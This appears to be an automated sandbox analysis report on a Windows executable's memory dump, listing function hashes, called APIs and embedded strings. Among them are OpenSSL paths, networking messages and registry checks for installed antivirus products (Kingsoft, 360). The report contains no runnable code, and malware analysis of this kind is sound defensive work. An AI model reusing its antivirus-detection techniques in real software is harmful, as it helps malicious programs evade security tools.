• Opcode ID: 28122bec5d0365b35727ff87482425a386fa70806b9bd1356752af99dfa25044
• Instruction ID: 115e640f266da5e7a23c9b7493ddbdca99f36257f17ff5d73488065e126239dd
• Opcode Fuzzy Hash: 28122bec5d0365b35727ff87482425a386fa70806b9bd1356752af99dfa25044
• Instruction Fuzzy Hash: A7411831D01605AFEF159F599C41BEFF7A8EF64715F24406BF801E2241EB788E019A79
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 00416F0D
  • Part of subcall function 0040F5F5: __EH_prolog.LIBCMT ref: 0040F5FA
  • Part of subcall function 0049708F: RaiseException.KERNEL32(?,?,?,?), ref: 004970CF
• _memmove_s.LIBCMT ref: 00416F63
Strings
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: H_prolog$ExceptionRaise_memmove_s
• String ID: deque<T> too long
• API String ID: 694128438-309773918
• Opcode ID: 6107d3720cea3e406d08557e1f1301ec271cdb492593c211a2a806bd274cd0dc
• Instruction ID: 2b1a6689d99e576706469e82d63c4aefb23e86ce05e04a73e1e9c8dd1322dd34
• Opcode Fuzzy Hash: 6107d3720cea3e406d08557e1f1301ec271cdb492593c211a2a806bd274cd0dc
• Instruction Fuzzy Hash: 6841D431B042059BCB18EBB9D9919EFB3F6AF84304B11853EE116D3781EB34ED858748
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 004185F7
  • Part of subcall function 0040F5F5: __EH_prolog.LIBCMT ref: 0040F5FA
  • Part of subcall function 0049708F: RaiseException.KERNEL32(?,?,?,?), ref: 004970CF
Strings
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: H_prolog$ExceptionRaise
• String ID: map/set<T> too long$tryno
• API String ID: 2062786585-3141562576
• Opcode ID: 54a081fea9e809e6ed896f4582871ba6c0b21bde45c7c3e82954b7d8c02e4317
• Instruction ID: d0a1e74af48d7b47051597b93ceb5859aa87f96766d47134bbb4924c8ea7da9a
• Opcode Fuzzy Hash: 54a081fea9e809e6ed896f4582871ba6c0b21bde45c7c3e82954b7d8c02e4317
• Instruction Fuzzy Hash: B0515A74500244DFC715DF18C284AA6BBE1BF15308F29C08EE8599B392CB7AFD85CBA5
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 00404B08
  • Part of subcall function 0040394C: __EH_prolog.LIBCMT ref: 00403951
  • Part of subcall function 0041C16D: __EH_prolog.LIBCMT ref: 0041C172
  • Part of subcall function 0041C16D: PathFileExistsW.SHLWAPI(?,?,?,?,00000000,?,00000000), ref: 0041C204
  • Part of subcall function 0041C16D: DeleteFileW.KERNEL32(?), ref: 0041C20C
  • Part of subcall function 0041C16D: DeleteFileW.KERNEL32(?), ref: 0041C236
  • Part of subcall function 0041C16D: CloseHandle.KERNEL32(00000000), ref: 0041C24E
  • Part of subcall function 0041BDA6: _strlen.LIBCMT ref: 0041BDB7
  • Part of subcall function 0041BDA6: _malloc.LIBCMT ref: 0041BDC1
  • Part of subcall function 0041BDA6: _strncpy.LIBCMT ref: 0041BDD3
Strings
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: FileH_prolog$Delete$CloseExistsHandlePath_malloc_strlen_strncpy
• String ID: www.baidu.com$www.qq.com
• API String ID: 3325068574-918363026
• Opcode ID: bb59302e0b64d1ac6f99c9a71346a84c31094be9a1ca3a59037222e23d067c7c
• Instruction ID: 91144525d69c3bb421cb4f2271f8db6199ead9df85abfdb21147b941dc96a3fc
• Opcode Fuzzy Hash: bb59302e0b64d1ac6f99c9a71346a84c31094be9a1ca3a59037222e23d067c7c
• Instruction Fuzzy Hash: C941827280111EEBDF10EFA8C941ADE7BB8AF44719F00412BF914A7291D778DB448B99
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: H_prolog
• String ID: \u%04x$|P
• API String ID: 3519838083-1318438770
• Opcode ID: ffff9054fd1e1b6429eb20bcec68f0c299ce2bbae40de6f833a0263817129e86
• Instruction ID: c9a97752738e52c29dc5a19e0e913a79cd620074f4c3996adc41de2a36ae7e3f
• Opcode Fuzzy Hash: ffff9054fd1e1b6429eb20bcec68f0c299ce2bbae40de6f833a0263817129e86
• Instruction Fuzzy Hash: 1A314D35904109EADB34ABE8C9C1BBE7BA4EF45B40B20863BF542731C1CA7C9947D14E
Uniqueness

Uniqueness Score: -1.00%

APIs
• _strtoul.LIBCMT ref: 0045F2CC
  • Part of subcall function 00495186: strtoxl.LIBCMT ref: 004951A6
Strings
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: _strtoulstrtoxl
• String ID: .\crypto\asn1\asn1_gen.c$Char=
• API String ID: 2961352152-708889550
• Opcode ID: 20904d6922b1d71e05cb4fd1f82cf1ce5dd22bff0e5936a69c952ae6e12d7274
• Instruction ID: 470e68ef20624f35763c37a8c302d285b444dd1f8299e494cad970fcdd15bc6d
• Opcode Fuzzy Hash: 20904d6922b1d71e05cb4fd1f82cf1ce5dd22bff0e5936a69c952ae6e12d7274
• Instruction Fuzzy Hash: CC21293160131117FB20AA1DEC92BDB77809F81716F88007BFD449A2C2E7AE844D8297
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: _memset
• String ID: .\crypto\buffer\buffer.c
• API String ID: 2102423945-294840303
• Opcode ID: e3fb7214e00fa49c701597cadb78f4ae45ca0ab9d41d01043d5f9bc5652977dc
• Instruction ID: 1390e71e346acd2a54a9364f18f4a16ca4b83104d3b4f6a800c7b21cffefcf73
• Opcode Fuzzy Hash: e3fb7214e00fa49c701597cadb78f4ae45ca0ab9d41d01043d5f9bc5652977dc
• Instruction Fuzzy Hash: DE2167B5B8030037E620AA2EFC83F5A66C59BC0720F58883FF649D72C1E4ACA8454228
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID:
• String ID: .\crypto\evp\evp_enc.c$b <= sizeof ctx->buf
• API String ID: 0-417187130
• Opcode ID: 7d9140a3fdae51139d2a627b3345676353e722ea4d47a927545eca3dd9f927be
• Instruction ID: 1b4e074680abac31625eb336f200df8f26ae89501b157c9c75b9be4188d6a8bf
• Opcode Fuzzy Hash: 7d9140a3fdae51139d2a627b3345676353e722ea4d47a927545eca3dd9f927be
• Instruction Fuzzy Hash: 5B21AE727043006BE714EE28FE41BAB73A5AFD8714F14446EF9459B381D3B9EC8286A5
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID:
• String ID: .\crypto\err\err.c$unknown
• API String ID: 0-565200744
• Opcode ID: 27239a99091f980f2728bb91ac0775785c582024607ac630f0138272690fd781
• Instruction ID: 030bdbfabaf9d965729f88803489f8e857cc22a082329638bb83512e934cf450
• Opcode Fuzzy Hash: 27239a99091f980f2728bb91ac0775785c582024607ac630f0138272690fd781
• Instruction Fuzzy Hash: AD11AFB9F90305A6FA203715AC47FAA79516B60F09FD5402AFA4C292C3E2FF0484859A
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: H_prolog
• String ID: tryno$version
• API String ID: 3519838083-731855146
• Opcode ID: ee8087cb9d551c663a0bc324f563e6acaa1ab8c18433957dcd79cdc429f1d64d
• Instruction ID: 770f7574135edff18c79ab00d173631eb268404c25d200b02f7ce59b9c0c5c20
• Opcode Fuzzy Hash: ee8087cb9d551c663a0bc324f563e6acaa1ab8c18433957dcd79cdc429f1d64d
• Instruction Fuzzy Hash: 7D214432A0024AEBD701EBA9CD41AEEB7A4AF14344F04453FE914E3242DB7CDA468799
Uniqueness

Uniqueness Score: -1.00%

APIs
• _strlen.LIBCMT ref: 004B911F
  • Part of subcall function 004B39D3: _strlen.LIBCMT ref: 004B3A16
Strings
Memory Dump Source
• Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: _strlen
• String ID: Authentication problem. Ignoring this.$Basic
• API String ID: 4218353326-1267713082
• Opcode ID: c46dcf22f0d7a2444d428da76c4cc7cd7153d63762eacde42219ca2b5c2da519
• Instruction ID: be82879842acfd70c82d4f721f275711c3b0e96713c73a83c479cae6366d95b4
• Opcode Fuzzy Hash: c46dcf22f0d7a2444d428da76c4cc7cd7153d63762eacde42219ca2b5c2da519
• Instruction Fuzzy Hash: 1D11E770404207AEEF208E1984497F23798AF05314F24456BEE899B242D7799D46ABB8
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 0040EB81
• lstrlenW.KERNEL32(?,?,?,?,?,?,00404161,?,?,?,?,?), ref: 0040EBB4
Strings
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: H_prologlstrlen
                                                                                                                                                • String ID: |P
                                                                                                                                                • API String ID: 2133942097-2149487505
                                                                                                                                                • Opcode ID: e050ae82504ed67cb3a527a31c56f4d773e484cb5ab18c060c9b0a5f63902725
                                                                                                                                                • Instruction ID: 140664ee0f10c41121dd8b7745b289536e9fbea1c81877f94128f894c16aa420
                                                                                                                                                • Opcode Fuzzy Hash: e050ae82504ed67cb3a527a31c56f4d773e484cb5ab18c060c9b0a5f63902725
                                                                                                                                                • Instruction Fuzzy Hash: 3F117F72900114ABCB00EF66DC459BFB7B8FB48715B10492BF412B7192D7399A11DB64
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 0041CA65
                                                                                                                                                  • Part of subcall function 004067A9: _memset.LIBCMT ref: 004067BD
                                                                                                                                                  • Part of subcall function 0041CB07: __vsnprintf.LIBCMT ref: 0041CB42
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: H_prolog__vsnprintf_memset
                                                                                                                                                • String ID: %02X$|P
                                                                                                                                                • API String ID: 872799359-1763487820
                                                                                                                                                • Opcode ID: f0770b7365e0d1d6f988adab4db0f2f478c5c36a7ef698e3a30a893f62f7f34c
                                                                                                                                                • Instruction ID: b0c82a78e53923e2ffe2b09d9954d42280c2a1fb55c00a8c8c1a59134d88e49a
                                                                                                                                                • Opcode Fuzzy Hash: f0770b7365e0d1d6f988adab4db0f2f478c5c36a7ef698e3a30a893f62f7f34c
                                                                                                                                                • Instruction Fuzzy Hash: 81118676A00514AFDB00EF99D846BBEB7A9EF84329F10442EF455E72C1C7785A118B98
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • _strlen.LIBCMT ref: 004AC2BD
                                                                                                                                                • __time64.LIBCMT ref: 004AC2E6
                                                                                                                                                  • Part of subcall function 0049301E: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0041906C,00000000,?,00418FBD,?), ref: 00493027
                                                                                                                                                  • Part of subcall function 004B39D3: _strlen.LIBCMT ref: 004B3A16
                                                                                                                                                Strings
                                                                                                                                                • Hostname in DNS cache was stale, zapped, xrefs: 004AC307
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Time_strlen$FileSystem__time64
                                                                                                                                                • String ID: Hostname in DNS cache was stale, zapped
                                                                                                                                                • API String ID: 2130245216-222773601
                                                                                                                                                • Opcode ID: ba568b7b5327ce90ce4220406ccc92b893be42d7ab30b0ab5a34c48ce39f26a9
                                                                                                                                                • Instruction ID: 209fe19511b35c37028c6dc2dd3dfbb30b0d231fd6eadc7a323116ae77074d75
                                                                                                                                                • Opcode Fuzzy Hash: ba568b7b5327ce90ce4220406ccc92b893be42d7ab30b0ab5a34c48ce39f26a9
                                                                                                                                                • Instruction Fuzzy Hash: D811C276900208ABDF50AB66CC85E9F77BCEF95314B50446EF80192152EB39EE059B64
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: __wcsicmp
                                                                                                                                                • String ID: %02X$dll
                                                                                                                                                • API String ID: 1389419275-3502532328
                                                                                                                                                • Opcode ID: d0c878bc02b5ab4fc705529d755ceff28a1d065dbb901079d88d0921b4a23e19
                                                                                                                                                • Instruction ID: 8af1641381d4a3440373d22551ecb88075e96fdb8c739d2d4d5911e629649626
                                                                                                                                                • Opcode Fuzzy Hash: d0c878bc02b5ab4fc705529d755ceff28a1d065dbb901079d88d0921b4a23e19
                                                                                                                                                • Instruction Fuzzy Hash: C701A5721043015ADB25EB69CDC499B73FC9F80314B104C3FB685A2091F778A88587A9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 0040E3FF
                                                                                                                                                • StrToIntW.SHLWAPI(00000000,?,004FC0AC,?,http=,?,?,0040E3BD,?,?,?), ref: 0040E464
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: H_prolog
                                                                                                                                                • String ID: http=
                                                                                                                                                • API String ID: 3519838083-2945583409
                                                                                                                                                • Opcode ID: 721116363b77f45873d6a2edf0de7df3daf7ef0a10cc9f195ba51920cdf674c7
                                                                                                                                                • Instruction ID: 2cbee9b8531c42b54d6c53c9ae6708ed9d9beca5086362a4fc07b242ba37c697
                                                                                                                                                • Opcode Fuzzy Hash: 721116363b77f45873d6a2edf0de7df3daf7ef0a10cc9f195ba51920cdf674c7
                                                                                                                                                • Instruction Fuzzy Hash: C11191329005159BCB20FF69C841A6EB7B4EF40324F104A3FE462B72D1DB79AD408B59
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00411A5A: __time64.LIBCMT ref: 00411A65
                                                                                                                                                  • Part of subcall function 0041131B: RegCloseKey.ADVAPI32(00000001,00000000,004124EF,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\360,00000001,00000010,00000000,?,?,004123A0,?), ref: 00411325
                                                                                                                                                  • Part of subcall function 0041131B: RegOpenKeyW.ADVAPI32(80000002,?,?), ref: 00411337
                                                                                                                                                • RegCloseKey.ADVAPI32(?,SOFTWARE\kingsoft\Antivirus,?,00000000,?,00401686,?,?,?,00000000,00000000,00000004), ref: 00419225
                                                                                                                                                  • Part of subcall function 004115AB: RegQueryValueExW.ADVAPI32(?,uninstall_time,00000000,00000000,?,00000004,00000000,?,00000000), ref: 004115D4
                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041920C
                                                                                                                                                Strings
                                                                                                                                                • SOFTWARE\kingsoft\Antivirus, xrefs: 004191D9
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Close$OpenQueryUnothrow_t@std@@@Value__ehfuncinfo$??2@__time64
                                                                                                                                                • String ID: SOFTWARE\kingsoft\Antivirus
                                                                                                                                                • API String ID: 530512226-843249376
                                                                                                                                                • Opcode ID: 87a65506b7199a55d2647d44200a45dea017adc14d36c4ed7c2698bcc35d840b
                                                                                                                                                • Instruction ID: 5a3fc126c6bcf51c3a9eb05916effdca2effe5c21df13178ac54ca3aa62ea988
                                                                                                                                                • Opcode Fuzzy Hash: 87a65506b7199a55d2647d44200a45dea017adc14d36c4ed7c2698bcc35d840b
                                                                                                                                                • Instruction Fuzzy Hash: 6D01B171604305AB8710EF6AAC8189BB7E8FBC4710F000E2FF940D2149D738DD4986AA
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • _memset.LIBCMT ref: 00443079
                                                                                                                                                  • Part of subcall function 00425D80: _raise.LIBCMT ref: 00425D9B
                                                                                                                                                Strings
                                                                                                                                                • ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 0044301E
                                                                                                                                                • .\crypto\evp\digest.c, xrefs: 00443028
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _memset_raise
                                                                                                                                                • String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
                                                                                                                                                • API String ID: 1484197835-3867593797
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Similarity
                                                                                                                                                • API ID: H_prolog
                                                                                                                                                • String ID: tid$|P
                                                                                                                                                • API String ID: 3519838083-555382461
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetSystemTime.KERNEL32(?), ref: 0041D132
                                                                                                                                                  • Part of subcall function 0041D221: __EH_prolog.LIBCMT ref: 0041D226
                                                                                                                                                  • Part of subcall function 0041D221: _strlen.LIBCMT ref: 0041D23F
                                                                                                                                                  • Part of subcall function 00407F97: __EH_prolog.LIBCMT ref: 00407F9C
                                                                                                                                                Strings
                                                                                                                                                • WSAGetLastError () = , xrefs: 0041D0FF
                                                                                                                                                • An error occured in WSAStartup operation: , xrefs: 0041D105
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Similarity
                                                                                                                                                • API ID: H_prolog$SystemTime_strlen
                                                                                                                                                • String ID: An error occured in WSAStartup operation: $WSAGetLastError () =
                                                                                                                                                • API String ID: 1905908749-3319688928
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 0041402C
                                                                                                                                                  • Part of subcall function 0048EA0D: _malloc.LIBCMT ref: 0048EA25
                                                                                                                                                • SysAllocString.OLEAUT32(ROOT\CIMV2), ref: 0041405E
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AllocH_prologString_malloc
                                                                                                                                                • String ID: ROOT\CIMV2
                                                                                                                                                • API String ID: 3020083124-2786109267
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0041D65E: __EH_prolog.LIBCMT ref: 0041D663
                                                                                                                                                • EnterCriticalSection.KERNEL32(00000004,?,00000000,00000004,?,?,?,0040167D,?,?,?,00000000,00000000,00000004), ref: 0040465F
                                                                                                                                                • LeaveCriticalSection.KERNEL32(00000004,?,?,?,0040167D,?,?,?,00000000,00000000,00000004), ref: 0040466E
                                                                                                                                                • EnterCriticalSection.KERNEL32(00000004,?,?,?,0040167D,?,?,?,00000000,00000000,00000004), ref: 0040467E
